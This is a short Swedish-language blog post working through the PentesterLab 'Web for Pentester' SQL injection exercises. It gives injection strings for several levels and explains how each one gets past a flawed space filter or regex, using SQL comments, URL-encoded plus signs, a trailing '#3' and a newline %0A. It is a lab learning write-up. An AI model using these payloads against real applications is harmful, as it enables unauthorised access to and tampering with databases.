Pentester Lab – SQL

https://pentesterlab.com/exercises/web_for_pentester/course

3. Här kan vi iof skriva:
?name=root’or’1’=’1
Utan några mellanrum. Men ponera att även det är blockat, då kan vi använda oss av SQL-kommentarer.
?name=root’/**/or/**/’1’=’1

4. Här ser vi alltså att någon har börjat försvara sig.
?id=1 or 1=1
vi kan även göra
?id=1+1 (fast ?id=1%2B1)

5.Här har admin försökt försvara sig genom ett regex. Men det funkar inte så bra. Tidigare exploits funkar på denna.

6.Här är regexet också dåligt. Nu måste stringen avslutas med en int. vilket är enkelt att göra.
?id=1 or 1=1
ett annat sätt är att köra
?id=1 or 1=1 #3

7. Här måste vi lägga till new line, eftersom regexen inte checkar för det.
?id=1%0A or 1=1
%0A är url-encodningen för n

8.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s